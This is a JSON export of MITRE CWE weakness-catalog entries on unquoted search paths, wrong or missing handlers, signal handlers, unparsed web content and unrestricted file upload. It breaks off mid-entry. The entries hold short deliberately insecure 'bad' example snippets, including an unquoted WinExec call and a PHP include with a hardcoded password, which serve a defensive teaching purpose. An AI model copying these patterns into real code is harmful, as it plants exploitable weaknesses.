WinExec.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"macOS","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly quote the full search path before executing a program on the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"UINT errCode = WinExec( \\"C:\\\\\\\\Program Files\\\\\\\\Foo\\\\\\\\Bar\\", SW_SHOW );"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1185","Description":"Small handful of others. Program doesn\'t quote the \\"C:\\\\Program Files\\\\\\" path when calling a program to be executed - or any other path with a directory or file whose name contains a space - so attacker can put a malicious program.exe into C:.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1185"},{"Reference":"CVE-2005-2938","Description":"CreateProcess() and CreateProcessAsUser() can be misused by applications to allow \\"program.exe\\" style attacks in C:","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2938"},{"Reference":"CVE-2000-1128","Description":"Applies to \\"Common Files\\" folder, with a malicious common.exe, instead of \\"Program Files\\"/program.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1128"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unquoted Search Path or Element"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Process Loading&#34;, Page 654"}}},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness could apply to any OS that supports spaces in filenames, especially any OS that make it easy for a user to insert spaces into filenames or folders, such as Windows. While spaces are technically supported in Unix, the practice is generally avoided. ."},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness primarily involves the lack of quoting, which is not explicitly stated as a part of CWE-116. CWE-116 also describes output in light of structured messages, but the generation of a filename or search path (as in this weakness) might not be considered a structured message.","An additional complication is the relationship to control spheres. Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere, this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control. This is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model needs enhancement or clarification."]},{"#text":"Under-studied, probably under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"430":{"attr":{"@_ID":"430","@_Name":"Deployment of Wrong Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The wrong \\"handler\\" is assigned to process an object.","Extended_Description":"An example of deploying the wrong handler would be calling a servlet to reveal source code of a .JSP file, or automatically \\"determining\\" type of the object even if it is contradictory to an explicitly specified type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This weakness is usually resultant from other weaknesses."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting an object."},{"Phase":"Architecture and Design","Description":"Reject any inconsistent types, such as a file with a .GIF extension that appears to consist of PHP code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0004","Description":"Source code disclosure via manipulated file extension that causes parsing by wrong DLL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0004"},{"Reference":"CVE-2002-0025","Description":"Web browser does not properly handle the Content-Type header field, causing a different application to process the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0025"},{"Reference":"CVE-2000-1052","Description":"Source code disclosure by directly invoking a servlet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1052"},{"Reference":"CVE-2002-1742","Description":"Arbitrary Perl functions can be loaded by calling a non-existent function that activates a handler.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1742"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Handler Deployment"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"11"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improper Handler Deployment","attr":{"@_Date":"2008-04-11"}}}},"431":{"attr":{"@_ID":"431","@_Name":"Missing Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A handler is not available or implemented.","Extended_Description":"When an exception is thrown and not caught, the process has given up an opportunity to decide if a given failure or event is worth a change in execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle all possible situations (e.g. error condition)."},{"Phase":"Implementation","Description":"If an operation can throw an Exception, implement a handler for that specific exception."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If a Servlet does not catch all exceptions, it may reveal debugging information that will help an adversary form a plan of attack. In the following method a DNS lookup failure will cause the Servlet to throw an exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"432":{"attr":{"@_ID":"432","@_Name":"Dangerous Signal Handler not Disabled During Sensitive Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running.","Extended_Description":"During the execution of a signal handler, it can be interrupted by another handler when a different signal is sent. If the two handlers share state - such as global variables - then an attacker can corrupt the state by sending another signal before the first handler has completed execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Turn off dangerous handlers when performing sensitive operations."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Dangerous handler not cleared/disabled during sensitive operations"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangerous Handler not Cleared/Disabled During Sensitive Operations","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangerous Handler not Disabled During Sensitive Operations","attr":{"@_Date":"2010-12-13"}}]}},"433":{"attr":{"@_ID":"433","@_Name":"Unparsed Raw Web Content Delivery","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.","Extended_Description":"If code is stored in a file with an extension such as \\".inc\\" or \\".pl\\", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"219","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting files."},{"Phase":"Architecture and Design","Description":"Do not store sensitive information in files which may be misinterpreted."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?&gt;","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?&gt;","xhtml:br":["","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1886","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1886"},{"Reference":"CVE-2002-2065","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2065"},{"Reference":"CVE-2005-2029","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2029"},{"Reference":"CVE-2001-0330","Description":"direct request to .pl file leaves it unparsed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330"},{"Reference":"CVE-2002-0614","Description":".inc file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0614"},{"Reference":"CVE-2004-2353","Description":"unparsed config.conf file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2353"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unparsed Raw Web Content Delivery"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Notes":{"Note":{"#text":"This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"}]}},"434":{"attr":{"@_ID":"434","@_Name":"Unrestricted Upload of File with Dangerous Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product\'s environment.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"351","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"430","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This can be primary when there is no check at all."},{"Ordinality":"Resultant","Description":"This is frequently resultant when use of double extensions (e.g. \\".php.gif\\") bypasses a sanity check."},{"Ordinality":"Resultant","Description":"This can be resultant from client-side enforcement (CWE-602); some products will include web script in web clients to check the filename, without verifying on the server side."}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unrestricted File Upload","Description":"The \\"unrestricted file upload\\" term is used in vulnerability databases and elsewhere, but it is insufficiently precise. The phrase could be interpreted as the lack of restrictions on the size or number of uploaded files, which is a resource consumption issue."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Arbitrary code execution is possible if an uploaded file is interpreted and executed as code by the recipient. This is especially true for .asp and .php extensions uploaded to web servers because these file types are often treated as automatically executable, even when file system permissions do not specify execution. For example, in Unix environments, programs typically cannot run unless the execute bit is set, but PHP programs may be executed by the web server without directly invoking them on the operating system."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"Phase":"Architecture and Design","Description":"Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions."]}},{"Phase":"Architecture and Design","Description":"Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that \\"filename.php.gif\\" is fed to the PHP interpreter.[REF-422] [REF-423]"},{"Phase":"Implementation","Description":"When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field."},{"Phase":"Implementation","Description":"Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited 